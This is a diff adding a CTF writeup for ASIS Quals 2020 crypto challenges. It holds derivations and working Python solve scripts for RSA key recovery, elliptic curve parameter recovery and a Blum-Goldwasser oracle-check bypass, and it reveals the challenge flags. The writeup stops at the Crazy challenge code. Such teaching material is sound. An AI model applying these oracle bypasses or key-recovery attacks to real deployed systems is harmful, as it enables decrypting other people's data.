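The cube-root claim is easy to test with exact integer arithmetic. The sketch below uses a hypothetical helper `icbrt` and a few made-up triples; it relies on the assumption that $y^2 + z < 3x^2 + 3x + 1$, which is what keeps $f$ strictly below $(x+1)^3$.

```python
def icbrt(n: int) -> int:
    """Floor of the cube root of a non-negative integer (binary search)."""
    lo, hi = 0, 1 << (n.bit_length() // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo

# Made-up triples (assumptions) with y^2 + z < 3x^2 + 3x + 1.
triples = [(2, 1, 1), (10, 5, 3), (12345, 678, 9)]
roots = [icbrt(x ** 3 + y ** 2 + z) for x, y, z in triples]
print(roots)
```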
+
+
Anyway… with my display of ignorance out of the way, let’s look at the challenge!
Reading through the code, we see that the flag is encrypted RSA style using three primes $p,q,r$. The message is also hashed with sha1 and the three primes used for encryption are fed into some fairly ugly polynomial named crow to produce another value pk.
+
+
The results of these computations are then all taken together, multiplied together and fed into the crow function again. The only output of the challenge is enc, which is the value of the second evaluation of the crow polynomial.
+
+
We then understand this challenge as learning how to find the integer solutions of crow so we can work backwards to finding the flag. Solving the first step will give us _enc, _hash and pk and solving pk = crow(p,q,r) we can grab the primes and reverse the encryption of _enc. But how do we solve crow?
+
+
During the competition I got totally sidetracked by the paper A Strategy for Finding Roots of Multivariate Polynomials with New Applications in Attacking RSA Variants by Jochemsz and May, and decided the solution to this puzzle must be to implement the small integer roots algorithm that they give in section 2.2 of the paper. This was hard to specialise to this polynomial and I failed. Potentially this method works, but I couldn’t get it to. The closest I got was to notice that the bitsize of _enc*pk was larger than the other two elements of crow and so by taking the cube root, I could recover the MSB of _enc*pk. Typing this up now I see I was kind of close, but thinking totally wrong.
+
+
The real solution is much simpler and more elegant, and relies on the fact that we can isolate certain terms in the polynomial because they appear with different powers (I’ve already explained this a little in the disclaimer). What we find is that with a few steps of algebra and a resetting of my intuition of cube roots, this challenge has a nice solution.
+
+
Solution
+
+
The first step to solving this challenge is simplifying the polynomial. I went down a rabbit hole of Legendre polynomials, taking the “dipole” hint way too seriously. I’m not sure what the “Tripolar” hint was pointing towards… maybe someone can enlighten me.
This is a big mess, but we can notice that the coefficient for all cubic terms is $1$ (ignoring the overall factor of a sixth) and we can start to piece together simple parts of this expression until we obtain
+
+\[C(x,y,z) = \frac16 \left((x + y + z + 1 )^3 + 3(x + y + 1)^2 + 2(x + y + 1) - 6y - z - 6 \right)\]
+
+
This is looking better, and by renaming a few pieces we get the polynomial into the form
+
+\[f(x,y,z) = x + y + z + 1 \qquad h(x,y) = x + y + 1\]
+
+
We now see how the disclaimer discussed above is going to help us. By taking the cube root of $6C$ (where $C$ is enc), we will recover the value for $f(x,y,z)$! Following this, we know that
+
+\[6 C - f^3 = 3h^2 + 2h - 6y - z - 6,\]
+
+
and by the same approximation, the square root of one third of the left hand side will be a good approximation for $h$. Note that the second time we solve crow, with the smaller inputs of the three primes, this approximation is off by one, which can be spotted either by making mistakes, or by trying out this step with some known values of $p,q,r$.
+
+
With knowledge of both $f(x,y,z)$ and $h(x,y)$, we can recover the input values from the three expressions
+
+\[\begin{align}
+z &= f - h \\
+y &= -\frac16 \left( 6C - f^3 - 3h^2 - 2h + z + 6\right) \\
+x &= h - y - 1
+\end{align}\]
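
The three expressions translate into a short inversion routine. The sketch below is built only on the simplified form of $C(x,y,z)$ quoted above, not on the challenge's original source, and it assumes non-negative inputs of roughly comparable size so that the cube-root step is exact. The names `crow`, `icbrt` and `invert_crow` are hypothetical; the small loop absorbs the off-by-one in the square-root estimate of $h$.

```python
from math import isqrt

def crow(x, y, z):
    """The simplified polynomial C(x, y, z) in the form quoted above."""
    f, h = x + y + z + 1, x + y + 1
    return (f**3 + 3 * h**2 + 2 * h - 6 * y - z - 6) // 6

def icbrt(n):
    """Floor of the cube root of a non-negative integer."""
    lo, hi = 0, 1 << (n.bit_length() // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid**3 <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo

def invert_crow(c):
    """Recover non-negative (x, y, z) from c = crow(x, y, z)."""
    f = icbrt(6 * c)
    rest = 6 * c - f**3               # equals 3h^2 + 2h - 6y - z - 6
    h = isqrt(rest // 3)              # may undershoot h, so step upwards
    while 3 * h * h + 3 * h < f + 6 + rest:
        h += 1                        # loop ends at the first h that makes y >= 0
    z = f - h
    y = (3 * h * h + 2 * h - z - 6 - rest) // 6
    x = h - y - 1
    return x, y, z

print(invert_crow(crow(101, 103, 107)))
```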
+
+
With the triple $(x,y,z)$ from crow we can find the input parameters from the gcd of the inputs:
+
diff --git a/ASIS-Quals-2020/readme.md b/ASIS-Quals-2020/readme.md
new file mode 100755
index 0000000..b1bdc13
--- /dev/null
+++ b/ASIS-Quals-2020/readme.md
@@ -0,0 +1,927 @@
+# ASIS Quals 2020
+
+A handful of write ups from some of the crypto challenges from ASIS 2020 Quals. Thanks to Aurel, Hrpr and Hyperreality for the tips while solving these. Cr0wn came 16th overall, and I learnt that I really need to get to grips with multivariate polynomials because Tripolar was solved by a bunch of teams and I just couldn't crack it...
+
+
+## Contents
+
+| Challenge | Points |
+| --------------------------------- | -----: |
+| [Baby RSA](#baby-rsa) | 60 |
+| [Elliptic Curve](#elliptic-curve) | 125 |
+| [Jazzy](#jazzy) | 122 |
+| [Crazy](#crazy) | 154 |
+| [Tripolar](#tripolar) | 154 |
+
+
+
+## Baby RSA
+
+> All babies love [RSA](https://asisctf.com/tasks/baby_rsa_704000e3703726346fa621a91a9f8097a9307929.txz). How about you? 😂
+
+
+#### Challenge
+
+```python
+#!/usr/bin/python
+
+from Crypto.Util.number import *
+import random
+from flag import flag
+
+nbit = 512
+while True:
+    p = getPrime(nbit)
+    q = getPrime(nbit)
+    e, n = 65537, p*q
+    phi = (p-1)*(q-1)
+    d = inverse(e, phi)
+    r = random.randint(12, 19)
+    if (d-1) % (1 << r) == 0:
+        break
+
+s, t = random.randint(1, min(p, q)), random.randint(1, min(p, q))
+t_p = pow(s*p + 1, (d-1)/(1 << r), n)
+t_q = pow(t*q + 4, (d-1)/(1 << r), n)
+
+print 'n =', n
+print 't_p =', t_p
+print 't_q =', t_q
+print 'enc =', pow(bytes_to_long(flag), e, n)
+```
+
+
+
+#### Solution
+
+To solve this challenge, we use that for the RSA cryptosystem the public and private keys obey
+
+$$
+e\cdot d - 1 \equiv 0 \mod \phi(n), \qquad \Rightarrow \qquad e\cdot d - 1 = k \cdot \phi(n), \quad k \in \mathbf{Z}
+$$
+
+and Euler's theorem, which states that
+
+$$
+\gcd(a,n) = 1 \qquad \Leftrightarrow \qquad a^{\phi(n)} \equiv 1\mod n
+$$
+
+We have the data $t_p, t_q, e, n$ which is sufficient to solve for $p$. Using that
+
+$$
+t_p = (sp + 1)^{\frac{d-1}{2^r}}
+$$
+
+We can take the $e$-th power to find
+
+$$
+\begin{align}
+t_p^e &= (sp + 1)^{\frac{ed-e}{2^r}} \mod n \\
+&= (sp + 1)^{\frac{k\phi(n) + 1 -e}{2^r}} \mod n \\
+&= (sp + 1)^{\frac{k\phi(n)}{2^r}} (sp + 1)^{\frac{1-e}{2^r}} \mod n
+\end{align}
+$$
+
+From Euler's theorem we have
+
+$$
+(sp + 1)^{\frac{k\phi(n)}{2^r}} \equiv 1^{\frac{k}{2^r}} \equiv 1 \mod n
+$$
+
+The value of `r` is small, `r = random.randint(12, 19)`, and we also have $e - 1 = 2^{16}$, so $m = \frac{1-e}{2^r}$ is, up to sign, a power of two. The actual value of $m$ isn't needed, as we can simply expand out $t_p^e$ and write down
+
+$$
+\begin{align}
+t_p^e - 1 = s p \cdot (s^{m-1} p^{m-1} + \ldots + m) \mod n \\
+\end{align}
+$$
+
+We see that $n$ and $t_p^e - 1$ share a common factor of $p$, and we can solve the challenge from
+
+$$
+\gcd(t_p^e - 1, n) = p
+$$
+
+**Note**: we can only treat $p$ as a true factor in the above line as $n = p\cdot q$, so by nature of the CRT, this expression simplifies.
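
A quick way to see why the gcd works: $sp + 1 \equiv 1 \mod p$, so any power of it is also $1$ modulo $p$. The toy sketch below uses made-up small primes and an arbitrary exponent standing in for $(d-1)/2^r$; none of these values come from the challenge.

```python
from math import gcd

# Toy parameters (assumptions, far too small to be secure).
p, q = 1009, 2003
n = p * q
e = 65537
s = 5
exponent = 12345        # stands in for (d - 1) / 2^r; any exponent works here

t_p = pow(s * p + 1, exponent, n)

# s*p + 1 is 1 modulo p, so every power of it is too, and p divides t_p^e - 1.
g = gcd(pow(t_p, e, n) - 1, n)
print(g, g % p == 0)
```

Unless the value also happens to be $1$ modulo $q$, the gcd is exactly $p$.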
+
+#### Implementation
+
+```python
+import math
+from Crypto.Util.number import *
+
+n = 10594734342063566757448883321293669290587889620265586736339477212834603215495912433611144868846006156969270740855007264519632640641698642134252272607634933572167074297087706060885814882562940246513589425206930711731882822983635474686630558630207534121750609979878270286275038737837128131581881266426871686835017263726047271960106044197708707310947840827099436585066447299264829120559315794262731576114771746189786467883424574016648249716997628251427198814515283524719060137118861718653529700994985114658591731819116128152893001811343820147174516271545881541496467750752863683867477159692651266291345654483269128390649
+e = 65537
+t_p = 4519048305944870673996667250268978888991017018344606790335970757895844518537213438462551754870798014432500599516098452334333141083371363892434537397146761661356351987492551545141544282333284496356154689853566589087098714992334239545021777497521910627396112225599188792518283722610007089616240235553136331948312118820778466109157166814076918897321333302212037091468294236737664634236652872694643742513694231865411343972158511561161110552791654692064067926570244885476257516034078495033460959374008589773105321047878659565315394819180209475120634087455397672140885519817817257776910144945634993354823069305663576529148
+t_q = 4223555135826151977468024279774194480800715262404098289320039500346723919877497179817129350823600662852132753483649104908356177392498638581546631861434234853762982271617144142856310134474982641587194459504721444158968027785611189945247212188754878851655525470022211101581388965272172510931958506487803857506055606348311364630088719304677522811373637015860200879231944374131649311811899458517619132770984593620802230131001429508873143491237281184088018483168411150471501405713386021109286000921074215502701541654045498583231623256365217713761284163181132635382837375055449383413664576886036963978338681516186909796419
+enc = 5548605244436176056181226780712792626658031554693210613227037883659685322461405771085980865371756818537836556724405699867834352918413810459894692455739712787293493925926704951363016528075548052788176859617001319579989667391737106534619373230550539705242471496840327096240228287029720859133747702679648464160040864448646353875953946451194177148020357408296263967558099653116183721335233575474288724063742809047676165474538954797346185329962114447585306058828989433687341976816521575673147671067412234404782485540629504019524293885245673723057009189296634321892220944915880530683285446919795527111871615036653620565630
+
+p = math.gcd(n, pow(t_p, e, n) - 1)
+q = n // p
+phi = (p-1)*(q-1)
+d = inverse(e, phi)
+flag = pow(enc,d,n)
+print(long_to_bytes(flag))
+# b'ASIS{baby___RSA___f0r_W4rM_uP}'
+```
+
+#### Flag
+
+`b'ASIS{baby___RSA___f0r_W4rM_uP}'`
+
+
+
+## Elliptic Curve
+
+### Challenge
+
+> Are all elliptic curves smooth and projective?
+>
+> ```
+> nc 76.74.178.201 9531
+> ```
+
+### Solution
+
+The hard part of this challenge was dealing with boring bugs when sending data to the server while resolving the proof of work. Once we connected to the server and passed the proof of work, we were given the prompt
+
+```
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++ hi! There are three integer points such that (x, y), (x+1, y), and +
++ (x+2, y) lies on the elliptic curve E. You are given one of them!! +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+| One of such points is: P = (68363894779467582714652102427890913001389987838216664654831170787294073636806, 48221249755015813573951848125928690100802610633961853882377560135375755871325)
+| Send the 37362287180362244417594168824436870719110262096489675495103813883375162938303 * P :
+```
+
+So the question is, given a single point $P$, together with the knowledge of the placement of three points, can we uniquely determine the curve?
+
+If we assume the curve is over some finite field with prime characteristic, and that as standard this challenge uses a curve of Weierstrass form, we know we are looking for curves of the form
+
+$$
+y^2 = x^3 + Ax + B \mod p
+$$
+
+and from the knowledge of the three points we have
+
+$$
+x^3 + Ax + B = (x+ 1)^3 + A(x+1) + B = (x + 2)^3 + A(x + 2) + B \mod p
+$$
+
+We can then write down
+
+$$
+x^3 + Ax = (x+ 1)^3 + A(x+1), \quad \Rightarrow \quad A = -1 -3x - 3x^2
+$$
+
+and
+
+$$
+x^3 + Ax = (x+ 2)^3 + A(x+2), \quad \Rightarrow \quad A = -4 -6x - 3x^2
+$$
+
+as all three points are on the same curve, we have that
+
+$$
+3x^2 + 3x + 1 = 3x^2 +6x +4, \quad \Rightarrow \quad x = -1
+$$
+
+and from the above we have $x = -1 \Rightarrow A = -1$. The only thing left to do is to find $B$, which we can see is recovered from the general form of the curve.
+
+$$
+y^2 = (-1)^3 + (-1)^2 + B, \quad \Rightarrow \quad B = y^2
+$$
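
As a sanity check of $A = -1$ and $B = y^2$, the sketch below verifies that the three points share the same $y$ on a toy curve. The prime and the value of $y$ are arbitrary assumptions.

```python
# Toy values (assumptions): a small prime field and an arbitrary y.
p = 10007
y = 1234
A = -1
B = y * y % p                      # from B = y^2

# x^3 - x vanishes at x = -1, 0, 1, so the right-hand side is always B.
on_curve = [(x**3 + A * x + B) % p == y * y % p for x in (-1, 0, 1)]
print(on_curve)
```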
+
+Now that we have recovered the initial point, we see that the triple of points is $(-1, y)$, $(0, y)$ and $(1,y)$. The last two of these points would be trivial to spot and we can see this isn't what the server is sending us. We can then know for certain that the given point
+
+```
+(68363894779467582714652102427890913001389987838216664654831170787294073636806, 48221249755015813573951848125928690100802610633961853882377560135375755871325)
+```
+
+is the point $(x_0, y_0) = (-1, y)$ . We can now recover the characteristic from
+
+$$
+-1 \equiv x_0 \mod p, \quad \Rightarrow \quad p = x_0 + 1
+$$
+
+and we can quickly check that
+
+```python
+sage: x0 = 68363894779467582714652102427890913001389987838216664654831170787294073636806
+sage: p = x0 + 1
+sage: print(p.is_prime())
+True
+```
+
+With everything now understood, we can take the point given by the server, together with the given scale factor, compute the scalar multiplication and send the new point back to the server
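
The solve script relies on Sage for the curve arithmetic. For readers without Sage, the scalar multiplication can be sketched in plain Python (3.8+ for modular inverses via `pow`). This is an illustrative alternative, not the code used during the CTF; `ec_add`, `ec_mul` and the toy curve are assumptions.

```python
def ec_add(P1, P2, a, p):
    """Add two affine points on y^2 = x^3 + a*x + b over GF(p); None is infinity."""
    if P1 is None:
        return P2
    if P2 is None:
        return P1
    x1, y1 = P1
    x2, y2 = P2
    if x1 == x2 and (y1 + y2) % p == 0:
        return None                                   # P + (-P)
    if P1 == P2:
        lam = (3 * x1 * x1 + a) * pow(2 * y1 % p, -1, p) % p
    else:
        lam = (y2 - y1) * pow((x2 - x1) % p, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return x3, (lam * (x1 - x3) - y1) % p

def ec_mul(k, P, a, p):
    """Double-and-add scalar multiplication."""
    R = None
    while k:
        if k & 1:
            R = ec_add(R, P, a, p)
        P = ec_add(P, P, a, p)
        k >>= 1
    return R

# Toy curve (assumptions): same shape as the challenge, x0 = p - 1 and a = -1.
p, a = 10007, -1
P = (p - 1, 1234)
b = (P[1] ** 2 - P[0] ** 3 - a * P[0]) % p
Q = ec_mul(5, P, a, p)
print(Q)
```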
+
+### Implementation
+
+```python
+import os
+os.environ["PWNLIB_NOTERM"] = "True"
+
+import hashlib
+import string
+import random
+from pwn import *
+
+IP = "76.74.178.201"
+PORT = 9531
+r = remote(IP, PORT, level="debug")
+POW = r.recvline().decode().split()
+x_len = int(POW[-1])
+suffix = POW[-5]
+hash_type = POW[-7].split('(')[0]
+
+"""
+The server asks for a random length string, hashed with a random hash
+function such that the last 3 bytes of the hash match a given suffix.
+"""
+while True:
+    X = ''.join(random.choices(string.ascii_letters + string.digits, k=x_len))
+    h = getattr(hashlib, hash_type)(X.encode()).hexdigest()
+    if h.endswith(suffix):
+        print(h)
+        break
+
+r.sendline(X)
+
+header = r.recvuntil(b'One of such points')
+
+points = r.recvline().split(b'P = (')[-1]
+points = points.split(b', ')
+px = Integer(points[0])
+py = Integer(points[-1][:-2])
+
+scale_data = r.recvline().split(b' ')
+scale = Integer(scale_data[3])
+
+p = px + 1
+assert p.is_prime()
+a = -1
+b = (py^2 - px^3 - a*px) % p
+E = EllipticCurve(GF(p), [a,b])
+P = E(px,py)
+
+Q = P*scale
+
+"""
+For some reason sending str(Q.xy()) to the server caused an error, so I
+just switched to interactive and sent it myself. I'm sure it's a dumb
+formatting bug, but with the annoying POW to deal with, I can't be bothered
+to figure it out...
+"""
+# r.sendline(str(Q.xy()))
+print(Q.xy())
+r.interactive()
+```
+
+#### Flag
+
+`ASIS{4n_Ellip71c_curve_iZ_A_pl4Ne_al9ebr4iC_cUrv3}`
+
+
+## Jazzy
+
+### Challenge
+
+>Jazzy in the real world, but it's flashy and showy!
+
+```
+nc 76.74.178.201 31337
+```
+
+### Solution
+
+Connecting to the server, we are given the following options:
+
+```
+------------------------------------------------------------------------
+| ..:: Jazzy semantically secure cryptosystem ::.. |
+| Try to break this cryptosystem and find the flag! |
+------------------------------------------------------------------------
+| Options: |
+| [E]ncryption function |
+| [F]lag (encrypted)! |
+| [P]ublic key |
+| [D]ecryption oracle |
+| [Q]uit |
+|----------------------------------------------------------------------|
+```
+
+Calling `E`, we are given the source of the encryption function:
+
+```python
+def encrypt(msg, pubkey):
+    h = len(bin(len(bin(pubkey)[2:]))[2:]) - 1 # dirty log :/
+    m = bytes_to_long(msg)
+    if len(bin(m)[2:]) % h != 0:
+        m = '0' * (h - len(bin(m)[2:]) % h) + bin(m)[2:]
+    else:
+        m = bin(m)[2:]
+    t = len(m) // h
+    M = [m[h*i:h*i+h] for i in range(t)]
+    r = random.randint(1, pubkey)
+    s_0 = pow(r, 2, pubkey)
+    C = []
+    for i in range(t):
+        s_i = pow(s_0, 2, pubkey)
+        k = bin(s_i)[2:][-h:]
+        c = bin(int(M[i], 2) ^ int(k, 2))[2:].zfill(h)
+        C.append(c)
+        s_0 = s_i
+    enc = int(''.join(C), 2)
+    return (enc, pow(s_i, 2, pubkey))
+```
+
+I'll talk about this more later, but let's play with the server and see what it allows us to do first.
+
+
+
+Sending the option `P` we get the `pubkey`
+
+```
+pubkey = 19386947523323881137657722758784550061106532690506305900249779841167576220076212135680639455022694670503210628255656646008011027142702455763327842867219209906085977668455830309111190774053501662218829125259002174637966634423791789251231110340244630214258655422173621444242489738175447333216354148711752466314530719614094724358835343148321688492410941279847726548532755612726470529315488889562870038948285553892644571111719902764495405902112917765163456381355663349414237105472911750206451801228088587783073435345892701332742065121188472147494459698861131293625595711112000070721340916959903684930522615446106875805793
+```
+
+Which, for reasons below, I will now refer to as the modulus $n$. Sending the option `F`, we get the encryption of the flag, again with `pubkey` as a label, but from the encryption function we know that the second value is (or at least should be) $s_{t+1} = s_t^2 \mod n$. Not sure why ASIS chose this confusing notation...
+
+```
+encrypt(flag, pubkey) = (513034390171324294434451277551689016606030017438707103869413492040051559571787250655384810990478248003042112532698503643742022419886333447600832984361864307529994477653561831340899157529404892382650382111633622198787716725365621822247147320745039924328861122790104611285962416151778910L, 1488429745298868766638479271207330114843847244232531062732057594917937561200978102167607190725732075771987314708915658110913826837267872416736589249787656499672811179741037216221767195188188763324278766203100220955272045310661887176873118511588238035347274102755393142846007358843931007832981307675991623888190387664964320071868166680149108371223039154927112978353227095505341351970335798938829053506618617396788719737045747877570660359923455754974907719535747353389095579477082285353626562184714935217407624849113205466008323762523449378494051510623802481835958533728111537252943447196357323856242125790983614239733L)
+```
+
+Lastly sending the option `D` we are given the prompt
+
+```
+| send an pair of integers, like (c, x), that you want to decrypt:
+```
+
+Being a wise guy, I tried sending the flag back to the server, but I was given the message
+
+```
+| this decryption is NOT allowed :P
+```
+
+Solving this challenge was easy after a bit of googling to try and see what this crypto system was. I noticed that the key stream was generated using a random number generator called [Blum Blum Shub](https://en.wikipedia.org/wiki/Blum_Blum_Shub). Looking for when this was used as a keystream, I stumbled upon the [Blum-Goldwasser Cryptosystem](https://en.wikipedia.org/wiki/Blum–Goldwasser_cryptosystem) and spending a little bit of time reading the Wikipedia page, I could tell that this was the right choice.
+
+#### Adaptive chosen ciphertext attack
+
+Reading more closely, I spotted that Blum-Goldwasser is insecure against adaptive chosen ciphertext attacks, where the attacker has access to a decryption oracle. This sounds great!!
+
+The idea is that to decrypt some ciphertext $(\vec{c}, s)$, one can pick a generic ciphertext using the same seed $(\vec{a}, s)$ and then use the decryption oracle to find $m^\prime$. As the seed is the same, both $m^\prime$ and the flag $m$ have been encrypted with the same keystream and we can obtain the flag from $m = \vec{a} \oplus \vec{c} \oplus m^\prime$.
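
To make the XOR bookkeeping concrete, here is a small sketch of the keystream-reuse idea. The flag, the random keystream (standing in for the Blum Blum Shub output for seed $s$) and the all-zero chosen ciphertext are all made up for illustration.

```python
import secrets


def xor(a, b):
    """Byte-wise XOR of two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


flag = b"ASIS{toy_flag}"                    # hypothetical secret
keystream = secrets.token_bytes(len(flag))  # stands in for the BBS output for seed s

c = xor(flag, keystream)                    # what the server hands out for [F]
a = bytes(len(flag))                        # attacker's chosen ciphertext (all zeros here)
m_prime = xor(a, keystream)                 # what a decryption oracle would return for (a, s)

recovered = xor(xor(a, c), m_prime)         # m = a XOR c XOR m'
print(recovered)
```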
+
+This sounds easy! Let's go back to the server and generate $m^\prime$:
+
+```
+| send an pair of integers, like (c, x), that you want to decrypt:
+(513034390171324294434451277551689016606030017438707103869413492040051559571787250655384810990478248003042112532698503643742022419886333447600832984361864307529994477653561831340899157529404892382650382111633622198787716725365621822247147320745039924328861122790104611285962416151778910, 1488429745298868766638479271207330114843847244232531062732057594917937561200978102167607190725732075771987314708915658110913826837267872416736589249787656499672811179741037216221767195188188763324278766203100220955272045310661887176873118511588238035347274102755393142846007358843931007832981307675991623888190387664964320071868166680149108371223039154927112978353227095505341351970335798938829053506618617396788719737045747877570660359923455754974907719535747353389095579477082285353626562184714935217407624849113205466008323762523449378494051510623802481835958533728111537252943447196357323856242125790983614239733)
+| this decryption is NOT allowed :P
+```
+
+Uh oh... it seems that the server checks the seed value and doesn't let us use this attack...
+
+#### Just one more block
+
+Okay, so if we can't use the same $s$ as the flag encryption, and we can't factor $n$ (waaaaaaay too big) what options do we have?
+
+I dunno if this attack has a proper name, but I realised we could fool the server into decrypting the flag by adding a block to the end of the ciphertext. For every block that is encoded, the encryption protocol takes $s_i$ and calculates $s_{i+1} = s_i^2 \mod n$. As a result, if the ciphertext being decoded was exactly one block longer, then the seed value we would supply to the oracle wouldn't be $s$, but rather $s^2 \mod n$.
+
+As we know `ct, s, n` we control enough data to solve the challenge, assuming that the server doesn't tell us off for sending $s^2 \mod n$...
+
+So, this *should* bypass the seed check in the oracle and allow us to decrypt the flag. All we need to do is take the pair `(ct, s)` from the server, together with the modulus `n`, add `h` bits to the end of `ct` and square `s`. Sending this to the oracle will decrypt our ciphertext block by block; we can then remove the last `h` bits (which will have decoded to garbage) and grab the flag.
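
The idea can be tried offline on a toy instance first. The sketch below is not the server's code: the primes, the message blocks and the `oracle` function (which refuses only an exact match on the seed) are assumptions made for the demo, and messages are kept as lists of `h`-bit blocks to keep it short. It needs Python 3.8+ for `pow(x, -1, m)`.

```python
# Toy parameters (assumption: tiny Blum primes, both congruent to 3 mod 4).
P, Q = 499, 547
N = P * Q
H = len(bin(len(bin(N)[2:]))[2:]) - 1   # same "dirty log" block size as the challenge
MASK = (1 << H) - 1


def encrypt(blocks, r):
    """Blum-Goldwasser on a list of H-bit blocks; returns (cipher blocks, s_{t+1})."""
    s = pow(r, 2, N)
    out = []
    for m in blocks:
        s = pow(s, 2, N)
        out.append(m ^ (s & MASK))
    return out, pow(s, 2, N)


def decrypt(blocks, x):
    """Private-key decryption: undo t+1 squarings of x, then replay the keystream."""
    t = len(blocks)
    dp = pow((P + 1) // 4, t + 1, P - 1)
    dq = pow((Q + 1) // 4, t + 1, Q - 1)
    up, uq = pow(x, dp, P), pow(x, dq, Q)
    s = (up * Q * pow(Q, -1, P) + uq * P * pow(P, -1, Q)) % N   # CRT recombination
    out = []
    for c in blocks:
        s = pow(s, 2, N)
        out.append(c ^ (s & MASK))
    return out


def oracle(blocks, x, banned_seed):
    """Hypothetical oracle: refuses only when the seed equals the flag's seed."""
    if x == banned_seed:
        return None
    return decrypt(blocks, x)


secret = [3, 14, 7, 0, 9]                 # made-up H-bit message blocks
ct, seed = encrypt(secret, 12345)

print(oracle(ct, seed, seed))             # None: the direct query is refused
extended = oracle(ct + [0], pow(seed, 2, N), seed)
print(extended[:-1] == secret)            # the junk last block is dropped
```

Appending one block makes the oracle undo one extra squaring, so it lands on the same $s_0$ and replays the same keystream for the first $t$ blocks.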
+
+To do this I wrote something quick and dirty
+
+```python
+n = 19386947523323881137657722758784550061106532690506305900249779841167576220076212135680639455022694670503210628255656646008011027142702455763327842867219209906085977668455830309111190774053501662218829125259002174637966634423791789251231110340244630214258655422173621444242489738175447333216354148711752466314530719614094724358835343148321688492410941279847726548532755612726470529315488889562870038948285553892644571111719902764495405902112917765163456381355663349414237105472911750206451801228088587783073435345892701332742065121188472147494459698861131293625595711112000070721340916959903684930522615446106875805793
+h = len(bin(len(bin(n)[2:]))[2:]) - 1
+
+flag_ct = 513034390171324294434451277551689016606030017438707103869413492040051559571787250655384810990478248003042112532698503643742022419886333447600832984361864307529994477653561831340899157529404892382650382111633622198787716725365621822247147320745039924328861122790104611285962416151778910
+seed = 1488429745298868766638479271207330114843847244232531062732057594917937561200978102167607190725732075771987314708915658110913826837267872416736589249787656499672811179741037216221767195188188763324278766203100220955272045310661887176873118511588238035347274102755393142846007358843931007832981307675991623888190387664964320071868166680149108371223039154927112978353227095505341351970335798938829053506618617396788719737045747877570660359923455754974907719535747353389095579477082285353626562184714935217407624849113205466008323762523449378494051510623802481835958533728111537252943447196357323856242125790983614239733
+seed_squared = pow(seed,2,n)
+flag_extended = bin(flag_ct)[2:] + '1'*h
+flag_extended = int(flag_extended, 2)
+
+print(f"({flag_extended}, {seed_squared})")
+```
+
+Sending our slightly longer ciphertext, built from the data collected above, to the server gives us a decrypted message:
+
+```
+(1050694431070872155001756216425859106009149475714472148724558831698025594003020289342228092908499451910230246466966535462383661915927210900686505951973098101821428690234494630586161474620221219599667982564625658263117243853548793491962157712885841765025507579474134243913651028278843209727, 3216641374118298063210229377328115445643813442578456023987769065661762517695051834586452075939576983800791011462122765510295327568646398522659752628912802933208909111321539625480585977865621874640928715606628766855738533853630742505790835948213775188951805695531626048779789826277990208281243968206104294503971898862963118207505455918079294280929081526755227996190831742555093366364879064928874861060462753403017976763786404530509469825731935018035684983539175758425557263211403465858234005521025395515018046387350089113701767863479780051534190944394815574406100307489105693633714510667995574063150674428700480235811)
+| the decrypted message is: 47771147116374265884489633343424974277884840496243413677482329815315049691915267634281287751924271959635398604756191897221446400520109091655450373658402419482516535670630080915290670126420548875478840451816545566711178369563850274167871301020132981380671014536902778264305709989256317962
+```
+
+Then we can simply grab the flag after chopping off the last `h = 11` bits:
+
+```python
+>>> from Crypto.Util.number import long_to_bytes
+>>> flag_ext = 47771147116374265884489633343424974277884840496243413677482329815315049691915267634281287751924271959635398604756191897221446400520109091655450373658402419482516535670630080915290670126420548875478840451816545566711178369563850274167871301020132981380671014536902778264305709989256317962
+>>> flag_bin = bin(flag_ext)[2:-11]
+>>> flag_int = int(flag_bin, 2)
+>>> flag = long_to_bytes(flag_int)
+>>> print(flag)
+b'((((......:::::: Great! the flag is: ASIS{BlUM_G0ldwaS53R_cryptOsySt3M_Iz_HI9hlY_vUlNEr4bl3_70_CCA!?} ::::::......))))'
+```
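
The 11 in the snippet above is the block size `h` from the "dirty log" line of `encrypt`. A short sketch of what that expression computes (the helper name `block_size` is made up here):

```python
def block_size(n):
    """The challenge's 'dirty log': floor(log2(bit length of n))."""
    return len(bin(len(bin(n)[2:]))[2:]) - 1


print(block_size(1 << 2047))        # a 2048-bit modulus -> 11
print(block_size((1 << 2047) - 1))  # a 2047-bit modulus -> 10
```

The same value can be written as `n.bit_length().bit_length() - 1`, which is perhaps easier to read.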
+
+No pwntools cracked out to do this one in a stylish way, but we still grab the flag!
+
+#### Flag
+
+`ASIS{BlUM_G0ldwaS53R_cryptOsySt3M_Iz_HI9hlY_vUlNEr4bl3_70_CCA!?}`
+
+## Crazy
+
+### Challenge
+
+>Look at you kids with your vintage music
+>
+>Comin' through satellites while cruisin'
+>
+>You're part of the past, but now you're the future
+>
+>Signals crossing can get confusing
+>
+>It's enough just to make you feel crazy, crazy, crazy
+>
+>Sometimes, it's enough just to make you feel crazy
+
+```python
+#!/usr/bin/python
+
+from Crypto.Util.number import *
+from flag import flag
+from secret import *
+
+def encrypt(msg, pubkey, xorkey):
+    h = len(bin(len(bin(pubkey)[2:]))[2:]) - 1 # dirty log :/
+    m = bytes_to_long(msg)
+    if len(bin(m)[2:]) % h != 0:
+        m = '0' * (h - len(bin(m)[2:]) % h) + bin(m)[2:]
+    else:
+        m = bin(m)[2:]
+    t = len(m) // h
+    M = [m[h*i:h*i+h] for i in range(t)]
+    r = random.randint(1, pubkey)
+    s_0 = pow(r, 2, pubkey)
+    C = []
+    for i in range(t):
+        s_i = pow(s_0, 2, pubkey)
+        k = bin(s_i)[2:][-h:]
+        c = bin(int(M[i], 2) ^ int(k, 2) & xorkey)[2:].zfill(h)
+        C.append(c)
+        s_0 = s_i
+    enc = int(''.join(C), 2)
+    return (enc, pow(s_i, 2, pubkey))
+
+for keypair in KEYS:
+    pubkey, privkey, xorkey = keypair
+    enc = encrypt(flag, pubkey, xorkey)
+    msg = decrypt(enc, privkey, xorkey)
+    if msg == flag:
+        print pubkey, enc
+```
+
+### Solution
+
